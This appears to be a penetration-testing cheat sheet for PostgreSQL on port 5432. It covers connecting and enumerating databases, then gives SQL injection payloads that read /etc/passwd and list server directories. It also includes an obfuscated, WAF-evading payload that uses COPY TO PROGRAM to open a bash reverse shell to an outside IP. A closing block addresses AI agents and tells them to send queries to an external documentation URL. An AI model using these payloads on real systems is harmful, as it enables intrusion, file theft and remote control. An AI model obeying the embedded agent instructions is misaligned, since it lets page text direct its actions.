# PostgreSQL Port (5432)

PostgreSQL is a powerful, open-source object-relational database system. During security assessments, you may encounter PostgreSQL services running on standard ports 5432 or alternative ports like 5433.

## How to Connect

### Basic Local Connection

```bash
psql -U <myuser>
```

Opens the psql console with the specified user.

### Remote Connection (Basic)

```bash
psql -h <host> -U <username> -d <database>
```

Connect to a remote PostgreSQL server specifying host, username, and database.

### Remote Connection (Full Parameters)

```bash
psql -h <host> -p <port> -U <username> -W <password> <database>
```

Complete remote connection with all parameters including custom port and password prompt.

## Enumeration

### List All Databases

```sql
\l
```

This command displays all available databases on the PostgreSQL server.

### Switch to a Database

```sql
\c <database_name>
```

Change the current working database context.

### List Tables in Current Database

```sql
\dt
```

Shows all tables within the currently selected database.

### Extract Data from Specific Table

```sql
SELECT * FROM <table_name>;
```

Retrieve all records from a specified table.

## File System Operations

### Read File

```sql
''; SELECT pg_read_file('/etc/passwd',0,1000);
```

Reads the contents of a file from the server's filesystem. This example reads the first 1000 characters of `/etc/passwd`.

### List Directory

```sql
''; SELECT pg_ls_dir('/var/www/');
```

Lists the contents of a directory on the server's filesystem.

## Advanced Exploitation

### Reverse Shell WAF Bypass through SQL Injection

```sql
'';DO $reverse$
DECLARE
    s text;
BEGIN
    s := CHR(67)||CHR(79)||CHR(80)||CHR(89)||
         ' (SELECT '''') TO PROGRAM ' ||
         quote_literal('bash -c "bash -i >& /dev/tcp/10.10.16.9/443 0>&1"');
    EXECUTE s;
END $reverse$;
```

This technique uses PostgreSQL's `COPY` command with a program execution to establish a reverse shell connection. The payload:

* Uses `CHR()` functions to obfuscate the "COPY" command
* Executes a bash reverse shell connecting to IP `10.10.16.9` on port `443`
* Bypasses basic WAF filters through string concatenation

**Note:** Remember to replace the IP address and port with your actual listener configuration.

## Security Considerations


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.